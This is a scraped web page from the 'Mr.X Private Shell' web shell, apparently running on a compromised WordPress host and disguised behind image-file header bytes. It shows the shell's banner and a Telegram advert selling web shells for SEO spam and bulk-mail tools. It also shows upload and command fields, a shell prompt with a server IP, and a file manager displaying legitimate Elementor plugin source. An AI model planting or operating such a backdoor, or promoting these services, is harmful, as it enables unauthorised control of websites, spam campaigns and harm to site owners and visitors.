����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.216.24: ~ $
<?php
namespace Elementor;

use Elementor\Includes\Widgets\Traits\Button_Trait;
use Elementor\Modules\Promotions\Controls\Promotion_Control;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

/**
 * Elementor button widget.
 *
 * Elementor widget that displays a button with the ability to control every
 * aspect of the button design.
 *
 * @since 1.0.0
 */
class Widget_Button extends Widget_Base {

	use Button_Trait;

	/**
	 * Get widget name.
	 *
	 * Retrieve button widget name.
	 *
	 * @since 1.0.0
	 * @access public
	 *
	 * @return string Widget name.
	 */
	public function get_name() {
		return 'button';
	}

	/**
	 * Get widget title.
	 *
	 * Retrieve button widget title.
	 *
	 * @since 1.0.0
	 * @access public
	 *
	 * @return string Widget title.
	 */
	public function get_title() {
		return esc_html__( 'Button', 'elementor' );
	}

	/**
	 * Get widget icon.
	 *
	 * Retrieve button widget icon.
	 *
	 * @since 1.0.0
	 * @access public
	 *
	 * @return string Widget icon.
	 */
	public function get_icon() {
		return 'eicon-button';
	}

	/**
	 * Get widget categories.
	 *
	 * Retrieve the list of categories the button widget belongs to.
	 *
	 * Used to determine where to display the widget in the editor.
	 *
	 * @since 2.0.0
	 * @access public
	 *
	 * @return array Widget categories.
	 */
	public function get_categories() {
		return [ 'basic' ];
	}

	protected function is_dynamic_content(): bool {
		return false;
	}

	public function has_widget_inner_wrapper(): bool {
		return ! Plugin::$instance->experiments->is_feature_active( 'e_optimized_markup' );
	}

	/**
	 * Get widget upsale data.
	 *
	 * Retrieve the widget promotion data.
	 *
	 * @since 3.19.0
	 * @access protected
	 *
	 * @return array Widget promotion data.
	 */
	protected function get_upsale_data() {
		return [
			'condition' => ! Utils::has_pro(),
			'image' => esc_url( ELEMENTOR_ASSETS_URL . 'images/go-pro.svg' ),
			'image_alt' => esc_attr__( 'Upgrade', 'elementor' ),
			'title' => esc_html__( 'Convert visitors into customers', 'elementor' ),
			'description' => esc_html__( 'Get the Call to Action widget and grow your toolbox with Elementor Pro.', 'elementor' ),
			'upgrade_url' => esc_url( 'https://go.elementor.com/go-pro-button-widget/' ),
			'upgrade_text' => esc_html__( 'Upgrade Now', 'elementor' ),
		];
	}

	protected function register_controls() {
		$this->start_controls_section(
			'section_button',
			[
				'label' => esc_html__( 'Button', 'elementor' ),
			]
		);

		$this->register_button_content_controls();

		$this->end_controls_section();

		$this->start_controls_section(
			'section_style',
			[
				'label' => esc_html__( 'Button', 'elementor' ),
				'tab' => Controls_Manager::TAB_STYLE,
			]
		);

		$this->register_button_style_controls();

		$this->end_controls_section();
	}

	/**
	 * Render button widget output on the frontend.
	 *
	 * Written in PHP and used to generate the final HTML.
	 *
	 * @since 1.0.0
	 * @access protected
	 */
	protected function render() {
		$this->render_button();
	}

	public function render_markdown(): string {
		$settings = $this->get_settings_for_display();

		$text = Utils::html_to_plain_text( $settings['text'] ?? '' );

		if ( empty( $text ) ) {
			return '';
		}

		if ( ! empty( $settings['link']['url'] ) ) {
			return '[' . $text . '](' . esc_url( $settings['link']['url'] ) . ')';
		}

		return '**' . $text . '**';
	}
}

Filemanager

Name Type Size Permission Actions
traits Folder 0755
accordion.php File 20.29 KB 0644
alert.php File 14.03 KB 0644
audio.php File 7.67 KB 0644
button.php File 3.33 KB 0644
common-base.php File 33.87 KB 0644
common-optimized.php File 840 B 0644
common.php File 204 B 0644
counter.php File 17.92 KB 0644
divider.php File 33.58 KB 0644
google-maps.php File 7.19 KB 0644
heading.php File 15.35 KB 0644
html.php File 2.88 KB 0644
icon-box.php File 25.36 KB 0644
icon-list.php File 22.81 KB 0644
icon.php File 13.12 KB 0644
image-box.php File 22.37 KB 0644
image-carousel.php File 28.67 KB 0644
image-gallery.php File 12.45 KB 0644
image.php File 21.06 KB 0644
inner-section.php File 917 B 0644
menu-anchor.php File 4.02 KB 0644
progress.php File 14.27 KB 0644
rating.php File 7.91 KB 0644
read-more.php File 3.63 KB 0644
shortcode.php File 3.61 KB 0644
sidebar.php File 3.05 KB 0644
social-icons.php File 18.47 KB 0644
spacer.php File 3.72 KB 0644
star-rating.php File 13.92 KB 0644
tabs.php File 17.47 KB 0644
testimonial.php File 18.31 KB 0644
text-editor.php File 15.28 KB 0644
toggle.php File 20.44 KB 0644
video.php File 34.87 KB 0644
wordpress.php File 7.42 KB 0644